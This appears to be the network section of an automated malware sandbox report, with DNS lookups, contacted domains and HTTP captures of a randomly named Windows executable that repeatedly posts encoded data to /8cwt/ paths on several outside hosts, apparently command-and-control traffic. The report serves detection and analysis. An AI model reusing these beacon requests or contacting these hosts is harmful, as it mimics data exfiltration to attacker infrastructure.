                                      Jun 4, 2024 14:18:25.849226952 CEST9.9.9.9192.168.11.300xddcbNo error (0)www.brongal.bybrongal.byCNAME (Canonical name)IN (0x0001)false
                                      Jun 4, 2024 14:18:25.849226952 CEST9.9.9.9192.168.11.300xddcbNo error (0)brongal.by93.125.99.134A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:26.475804090 CEST1.1.1.1192.168.11.300xddcbNo error (0)www.brongal.bybrongal.byCNAME (Canonical name)IN (0x0001)false
                                      Jun 4, 2024 14:18:26.475804090 CEST1.1.1.1192.168.11.300xddcbNo error (0)brongal.by93.125.99.134A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:39.989677906 CEST9.9.9.9192.168.11.300x2fa7No error (0)www.jdps.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                      Jun 4, 2024 14:18:39.989677906 CEST9.9.9.9192.168.11.300x2fa7No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                      Jun 4, 2024 14:18:39.989677906 CEST9.9.9.9192.168.11.300x2fa7No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.232.203.70A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:39.989677906 CEST9.9.9.9192.168.11.300x2fa7No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.231.96.3A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:53.380063057 CEST9.9.9.9192.168.11.300xfa77No error (0)www.belgravevilla.combelgravevilla.comCNAME (Canonical name)IN (0x0001)false
                                      Jun 4, 2024 14:18:53.380063057 CEST9.9.9.9192.168.11.300xfa77No error (0)belgravevilla.com92.205.8.26A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:07.567127943 CEST9.9.9.9192.168.11.300xbb6cNo error (0)www.insist.site3.64.163.50A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:21.394455910 CEST9.9.9.9192.168.11.300xa3edName error (3)www.runonbattery.comnonenoneA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:29.608365059 CEST9.9.9.9192.168.11.300x833bName error (3)www.nemeanshop.comnonenoneA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:37.881947041 CEST9.9.9.9192.168.11.300x1874No error (0)www.nurenose.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                      Jun 4, 2024 14:19:37.881947041 CEST9.9.9.9192.168.11.300x1874No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:51.814904928 CEST9.9.9.9192.168.11.300x17edNo error (0)www.cd14j.us91.195.240.123A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:22:55.189209938 CEST9.9.9.9192.168.11.300xef91Name error (3)www.donumul.comnonenoneA (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • drive.google.com
                                      • drive.usercontent.google.com
                                      • www.respirelavie.net
                                      • www.airportsurvery.com
                                      • www.innovtech.life
                                      • www.k4ryd.us
                                      • www.accentbathrooms.com
                                      • www.shun-yamagata.com
                                      • www.brongal.by
                                      • www.jdps.org
                                      • www.belgravevilla.com
                                      • www.insist.site
                                      • www.nurenose.com
                                      • www.cd14j.us

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.11.3049845192.3.27.169802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:11.970091105 CEST431OUTGET /8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.respirelavie.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:15:12.291779041 CEST401INHTTP/1.1 400 Bad Request
                                      Date: Tue, 04 Jun 2024 12:15:10 GMT
                                      Server:
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 150
                                      Connection: close
                                      X-XSS-Protection: 1; mode=block
                                      X-Content-Type-Options: nosniff
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.11.3049847173.232.18.161802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:27.639980078 CEST704OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 48 43 4d 4c 33 38 55 55 72 50 61 39 47 69 6b 73 79 76 39 4b 43 41 51 54 66 61 54 58 34 57 4a 4b 4d 42 68 64 47 4c 57 7a 48 37 54 61 46 4c 32 4b 33 38 55 4b 4b 45 33 53 45 37 49 44 58 76 31 79 6d 44 50 57 69 68 68 77 4b 2f 53 47 75 6d 63 67 6e 50 63 65 68 4a 56 71 6a 4b 4a 66 6c 76 43 64 36 6b 53 7a 31 78 30 35 49 59 76 53 62 4a 6c 33 4c 6b 42 33 5a 65 78 34 68 6a 2f 75 61 46 65 76 5a 36 36 52 47 77 58 58 4e 39 4f 53 42 56 62 6e 50 33 31 6e 47 73 72 63 42 67 66 37 6a 2f 57 46 59 2f 77 62 77 4c 5a 30 68 36 4f 37 30 58 59 69 64 57 4f 71 73 51 56 47 4e 78 4d 6b 6a 4e 56 44 46 41 3d 3d
                                      Data Ascii: 24eluX=HCML38UUrPa9Giksyv9KCAQTfaTX4WJKMBhdGLWzH7TaFL2K38UKKE3SE7IDXv1ymDPWihhwK/SGumcgnPcehJVqjKJflvCd6kSz1x05IYvSbJl3LkB3Zex4hj/uaFevZ66RGwXXN9OSBVbnP31nGsrcBgf7j/WFY/wbwLZ0h6O70XYidWOqsQVGNxMkjNVDFA==
                                      Jun 4, 2024 14:15:27.807467937 CEST974INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:14:50 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip
                                      Data Raw: 32 64 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 cb 6e d3 40 14 dd e7 2b 2e de 24 91 5a 4f 8a 40 42 89 63 89 d2 20 90 4a a9 68 2a 81 10 42 63 fb 26 1e b0 67 86 99 71 d3 14 90 58 21 58 01 1b 04 2a 2b e8 82 87 40 48 6c 40 3c be a6 e1 b1 e2 17 b8 76 02 2d 8f 15 0b 5b f2 dc 73 ce 3d f7 31 0e 0e 2c 9d 3e d6 3f b7 da 83 13 fd 53 cb b0 ba be b8 7c f2 18 78 f3 8c 9d ec f5 8f 33 b6 d4 5f 9a 46 0e fa 2d c6 7a 2b 5e 58 0b 52 97 67 61 90 22 4f e8 c3 09 97 61 38 b9 b3 33 d9 79 b6 fb ee ee ee fb 27 5f 9f de 98 ec 3c ff f6 e0 cd b7 ed 9b 93 ed c7 df 3f dc da 7d fb 72 b2 fd f1 fb 87 db 93 57 0f 3e df 7f f7 e5 e3 bd 2f 2f 1e 06 6c 4a ad 05 36 36 42 3b b0 26 ee 7a ec d2 95 02 cd d8 cf 85 f4 2f 59 0f c2 80 4d c3 94 8a 55 29 83 48 25 63 4a bf 10 06 1c 52 83 03 22 79 50 69 75 eb ff e1 a3 fe 7f e6 39 39 23 0f d4 8d 85 70 45 39 38 ae 0a 99 cc 8e 74 d8 4f 11 0c 52 29 d6 61 02 eb 67 96 61 c4 2d 48 c2 0d 4a 1c 28 09 2e 15 16 2c 9a 0d 34 7e c0 34 29 e9 f0 68 92 08 27 94 e4 59 36 9e 03 0e 87 5a 87 e0 97 78 0d 8d 51 a6 12 42 [TRUNCATED]
                                      Data Ascii: 2dcTn@+.$ZO@Bc Jh*Bc&gqX!X*+@Hl@<v-[s=1,>?S|x3_F-z+^XRga"Oa83y'_<?}rW>//lJ66B;&z/YMU)H%cJR"yPiu99#pE98tOR)aga-HJ(.,4~4)h'Y6ZxQBCCTdSPX.WT\(]yr=g<IZ<&Zh<faUGZ4/v\ S8t<CNPao 0mQ<]e\^G'F`o!Q.ka>Q!lChh4np.$AaF}fDY5XeDj|3Avyu#B=uNzFBj6c[[~XG\X&e[DpL6S\\V-IQi2zb+<7-v8PftwU/&0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.11.3049848173.232.18.161802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:30.318486929 CEST724OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 48 43 4d 4c 33 38 55 55 72 50 61 39 41 43 55 73 30 4f 39 4b 56 77 51 63 51 36 54 58 6a 47 4a 4f 4d 42 64 64 47 4a 36 5a 45 49 6e 61 46 75 4b 4b 32 39 55 4b 5a 30 33 53 4b 62 49 43 54 76 31 39 6d 44 44 65 69 6b 5a 77 4b 2f 47 47 75 6d 4d 67 6e 34 6f 5a 67 5a 56 6f 6f 71 4a 64 72 50 43 64 36 6b 53 7a 31 78 77 48 49 63 44 53 62 5a 56 33 4c 47 35 32 48 4f 78 6e 67 6a 2f 75 4c 56 65 72 5a 36 36 76 47 30 58 39 4e 34 4b 53 42 56 72 6e 4d 6a 68 6b 50 73 72 61 4f 41 65 52 75 2b 7a 4e 65 66 41 39 37 39 42 59 6b 6f 36 78 31 41 70 34 41 56 36 6f 2f 77 70 72 52 77 68 4d 68 50 55 59 59 45 4f 33 53 76 74 77 41 48 2f 69 6a 2f 33 6c 34 4d 42 64 35 73 51 3d
                                      Data Ascii: 24eluX=HCML38UUrPa9ACUs0O9KVwQcQ6TXjGJOMBddGJ6ZEInaFuKK29UKZ03SKbICTv19mDDeikZwK/GGumMgn4oZgZVooqJdrPCd6kSz1xwHIcDSbZV3LG52HOxngj/uLVerZ66vG0X9N4KSBVrnMjhkPsraOAeRu+zNefA979BYko6x1Ap4AV6o/wprRwhMhPUYYEO3SvtwAH/ij/3l4MBd5sQ=
                                      Jun 4, 2024 14:15:30.485426903 CEST974INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:14:53 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip
                                      Data Raw: 32 64 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 cb 6e d3 40 14 dd e7 2b 2e de 24 91 5a 4f 8a 40 42 89 63 89 d2 20 90 4a a9 68 2a 81 10 42 63 fb 26 1e b0 67 86 99 71 d3 14 90 58 21 58 01 1b 04 2a 2b e8 82 87 40 48 6c 40 3c be a6 e1 b1 e2 17 b8 76 02 2d 8f 15 0b 5b f2 dc 73 ce 3d f7 31 0e 0e 2c 9d 3e d6 3f b7 da 83 13 fd 53 cb b0 ba be b8 7c f2 18 78 f3 8c 9d ec f5 8f 33 b6 d4 5f 9a 46 0e fa 2d c6 7a 2b 5e 58 0b 52 97 67 61 90 22 4f e8 c3 09 97 61 38 b9 b3 33 d9 79 b6 fb ee ee ee fb 27 5f 9f de 98 ec 3c ff f6 e0 cd b7 ed 9b 93 ed c7 df 3f dc da 7d fb 72 b2 fd f1 fb 87 db 93 57 0f 3e df 7f f7 e5 e3 bd 2f 2f 1e 06 6c 4a ad 05 36 36 42 3b b0 26 ee 7a ec d2 95 02 cd d8 cf 85 f4 2f 59 0f c2 80 4d c3 94 8a 55 29 83 48 25 63 4a bf 10 06 1c 52 83 03 22 79 50 69 75 eb ff e1 a3 fe 7f e6 39 39 23 0f d4 8d 85 70 45 39 38 ae 0a 99 cc 8e 74 d8 4f 11 0c 52 29 d6 61 02 eb 67 96 61 c4 2d 48 c2 0d 4a 1c 28 09 2e 15 16 2c 9a 0d 34 7e c0 34 29 e9 f0 68 92 08 27 94 e4 59 36 9e 03 0e 87 5a 87 e0 97 78 0d 8d 51 a6 12 42 [TRUNCATED]
                                      Data Ascii: 2dcTn@+.$ZO@Bc Jh*Bc&gqX!X*+@Hl@<v-[s=1,>?S|x3_F-z+^XRga"Oa83y'_<?}rW>//lJ66B;&z/YMU)H%cJR"yPiu99#pE98tOR)aga-HJ(.,4~4)h'Y6ZxQBCCTdSPX.WT\(]yr=g<IZ<&Zh<faUGZ4/v\ S8t<CNPao 0mQ<]e\^G'F`o!Q.ka>Q!lChh4np.$AaF}fDY5XeDj|3Avyu#B=uNzFBj6c[[~XG\X&e[DpL6S\\V-IQi2zb+<7-v8PftwU/&0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.11.3049849173.232.18.161802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:33.008725882 CEST1641OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 48 43 4d 4c 33 38 55 55 72 50 61 39 41 43 55 73 30 4f 39 4b 56 77 51 63 51 36 54 58 6a 47 4a 4f 4d 42 64 64 47 4a 36 5a 45 49 2f 61 47 59 2b 4b 32 61 41 4b 61 30 33 53 56 72 49 66 54 76 31 61 6d 44 62 61 69 6b 45 50 4b 39 2b 47 38 31 30 67 76 74 45 5a 70 5a 56 6f 6e 4b 4a 41 6c 76 43 49 36 6b 69 33 31 78 67 48 49 63 44 53 62 66 5a 33 66 45 42 32 41 2b 78 34 68 6a 2f 79 61 46 65 54 5a 36 79 5a 47 30 44 48 59 63 2b 53 42 78 50 6e 4e 51 5a 6b 41 73 72 59 4e 41 65 4a 75 2b 50 43 65 66 63 35 37 34 39 79 6b 76 57 78 31 47 38 2f 62 6d 53 43 38 67 39 51 53 51 70 6e 6e 50 41 6d 65 32 2b 41 61 66 31 39 41 7a 76 66 75 59 2f 62 6b 65 5a 6e 71 49 4d 6e 33 78 57 74 73 63 35 45 72 76 31 39 68 73 4a 56 48 58 46 62 77 75 48 7a 7a 64 71 70 57 34 79 55 4a 32 38 42 6a 69 33 2b 30 67 72 43 70 6f 77 72 34 33 64 64 6f 72 74 4a 54 68 6c 58 73 4b 51 69 53 77 69 6d 32 35 62 59 4c 71 4e 38 70 46 76 36 59 71 4d 44 49 5a 45 62 63 6e 66 54 4e 56 4d 49 6a 57 65 37 76 56 64 51 62 2f 63 6f 76 42 72 55 33 65 6a [TRUNCATED]
                                      Data Ascii: 24eluX=HCML38UUrPa9ACUs0O9KVwQcQ6TXjGJOMBddGJ6ZEI/aGY+K2aAKa03SVrIfTv1amDbaikEPK9+G810gvtEZpZVonKJAlvCI6ki31xgHIcDSbfZ3fEB2A+x4hj/yaFeTZ6yZG0DHYc+SBxPnNQZkAsrYNAeJu+PCefc5749ykvWx1G8/bmSC8g9QSQpnnPAme2+Aaf19AzvfuY/bkeZnqIMn3xWtsc5Erv19hsJVHXFbwuHzzdqpW4yUJ28Bji3+0grCpowr43ddortJThlXsKQiSwim25bYLqN8pFv6YqMDIZEbcnfTNVMIjWe7vVdQb/covBrU3ejCI1OntHlFUU9mT3XIhc1Q+51UH2IJ3wWI1QXTulSNuyxnHWwz9kXFq2VS19hVkzhEqYX3enFpTMsQtddZrsT2+wnYMyZSs8Gr0mom5Cnd3VihMPeuh6bWW3E27Fk50DZMisp9jeGZx/kD3npdM/BI21nzONWTS+/56jWe2/ZRejTNRh4eoxlqt5zPCsth1fKqGABDAYGovtnPA8vj7XzY1xIeN6Ys/Y6pAwhP/EoZmL6VFzB24tCHcOUEU0XHiLoM8UrB8mA2pYXyFJqTlDYkCTDgHSfzxfELyJ3FMmMkUJ6RaEA6SsV7N7myXW0KIyrYsR/NeHed0Ee4+vanshyCMpIM/z6/0+vPJAPOYQPNFN9GmN7qfsxW+3qD96rX6gu0XDULh6Yew4IqIEeJAXmCvRLSOYLrzuJd5ux12kEtYRIenBsRjTN44hC+zftBW5Dx4T9YyVtNWYL9VJu5wC/Ouequ80u7qvt66lGxUsYaMzEhtGcLjaA+IVaPb5zEKkOAiSeNiWKNdxvSMtgmoN6kArrMQFMMhlWpU5EDj4SGteZOS2KgvpNcS/wgdp+Vrcv2bpi4Ui4xYuvHzzF8A5cHyR9eqlVUAKL61lI7L/yECxdHWDARkahIKZPFsmWgzanM2xkY/3pIvyXQhKmz0+d1pFfgDsKOd0399 [TRUNCATED]
                                      Jun 4, 2024 14:15:33.175259113 CEST974INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:14:55 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip
                                      Data Raw: 32 64 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 cb 6e d3 40 14 dd e7 2b 2e de 24 91 5a 4f 8a 40 42 89 63 89 d2 20 90 4a a9 68 2a 81 10 42 63 fb 26 1e b0 67 86 99 71 d3 14 90 58 21 58 01 1b 04 2a 2b e8 82 87 40 48 6c 40 3c be a6 e1 b1 e2 17 b8 76 02 2d 8f 15 0b 5b f2 dc 73 ce 3d f7 31 0e 0e 2c 9d 3e d6 3f b7 da 83 13 fd 53 cb b0 ba be b8 7c f2 18 78 f3 8c 9d ec f5 8f 33 b6 d4 5f 9a 46 0e fa 2d c6 7a 2b 5e 58 0b 52 97 67 61 90 22 4f e8 c3 09 97 61 38 b9 b3 33 d9 79 b6 fb ee ee ee fb 27 5f 9f de 98 ec 3c ff f6 e0 cd b7 ed 9b 93 ed c7 df 3f dc da 7d fb 72 b2 fd f1 fb 87 db 93 57 0f 3e df 7f f7 e5 e3 bd 2f 2f 1e 06 6c 4a ad 05 36 36 42 3b b0 26 ee 7a ec d2 95 02 cd d8 cf 85 f4 2f 59 0f c2 80 4d c3 94 8a 55 29 83 48 25 63 4a bf 10 06 1c 52 83 03 22 79 50 69 75 eb ff e1 a3 fe 7f e6 39 39 23 0f d4 8d 85 70 45 39 38 ae 0a 99 cc 8e 74 d8 4f 11 0c 52 29 d6 61 02 eb 67 96 61 c4 2d 48 c2 0d 4a 1c 28 09 2e 15 16 2c 9a 0d 34 7e c0 34 29 e9 f0 68 92 08 27 94 e4 59 36 9e 03 0e 87 5a 87 e0 97 78 0d 8d 51 a6 12 42 [TRUNCATED]
                                      Data Ascii: 2dcTn@+.$ZO@Bc Jh*Bc&gqX!X*+@Hl@<v-[s=1,>?S|x3_F-z+^XRga"Oa83y'_<?}rW>//lJ66B;&z/YMU)H%cJR"yPiu99#pE98tOR)aga-HJ(.,4~4)h'Y6ZxQBCCTdSPX.WT\(]yr=g<IZ<&Zh<faUGZ4/v\ S8t<CNPao 0mQ<]e\^G'F`o!Q.ka>Q!lChh4np.$AaF}fDY5XeDj|3Avyu#B=uNzFBj6c[[~XG\X&e[DpL6S\\V-IQi2zb+<7-v8PftwU/&0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.11.3049850173.232.18.161802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:35.691826105 CEST433OUTGET /8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:15:36.539907932 CEST1289INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:14:59 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Data Raw: 34 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 8f a4 e5 a4 a9 e4 b9 90 e4 bb a3 e8 a8 80 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 ef bc 88 e4 b8 ad e5 9b bd ef bc 89 e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 27 e5 8f a4 e5 a4 a9 e4 b9 90 e4 bb a3 e8 a8 80 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 ef bc 88 e4 b8 ad e5 9b bd ef bc 89 e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 27 3e e5 8f a4 e5 a4 a9 e4 b9 90 e4 bb a3 e8 a8 80 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 ef bc 88 e4 b8 ad e5 9b bd ef bc 89 e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 3c 2f 61 3e 3c 2f 68 31 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e [TRUNCATED]
                                      Data Ascii: 48c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title></title><script src="/jquery.min.js" ></script></head><body><h1><a href="/" title=''></a></h1><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.meas-elec.com Port 80</address><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/airportsurvery.com.xml" target="_blank">XML </a> | <a href="/airportsurvery.com.html" target="_blank">Sitemap </a></div><script> (function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') {bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else{bp.src = ' [TRUNCATED]
                                      Jun 4, 2024 14:15:36.539975882 CEST93INData Raw: 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 20 7d 29 28 29 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74
                                      Data Ascii: yTagName("script")[0];s.parentNode.insertBefore(bp, s); })(); </script></body></html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.11.3049851203.161.49.193802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:41.927440882 CEST692OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 66 51 42 6d 6d 59 7a 36 71 76 4b 2b 44 66 37 65 31 6f 5a 42 69 42 78 71 63 4a 7a 63 7a 73 54 39 37 75 43 39 41 52 35 75 67 4c 63 6e 4f 4f 75 71 71 75 76 7a 71 56 62 62 72 57 30 6f 30 4e 76 49 65 30 32 35 6e 78 39 45 6a 44 62 73 77 72 54 73 2b 2b 51 49 48 50 49 69 44 4b 66 49 39 37 49 2f 30 34 4b 73 6a 41 4d 55 4e 35 47 64 4c 63 6f 75 72 46 33 57 65 4b 43 36 77 36 59 6b 2f 43 77 76 6e 66 34 64 59 72 30 58 64 35 70 76 6a 4c 53 2f 4a 74 77 2b 49 4e 48 41 74 39 34 55 46 52 6b 7a 56 42 5a 50 6e 6b 49 66 34 66 46 49 59 76 33 47 34 6e 63 6f 43 70 57 30 67 78 4b 58 33 43 51 30 6b 41 3d 3d
                                      Data Ascii: 24eluX=fQBmmYz6qvK+Df7e1oZBiBxqcJzczsT97uC9AR5ugLcnOOuqquvzqVbbrW0o0NvIe025nx9EjDbswrTs++QIHPIiDKfI97I/04KsjAMUN5GdLcourF3WeKC6w6Yk/Cwvnf4dYr0Xd5pvjLS/Jtw+INHAt94UFRkzVBZPnkIf4fFIYv3G4ncoCpW0gxKX3CQ0kA==
                                      Jun 4, 2024 14:15:42.108845949 CEST533INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:15:42 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
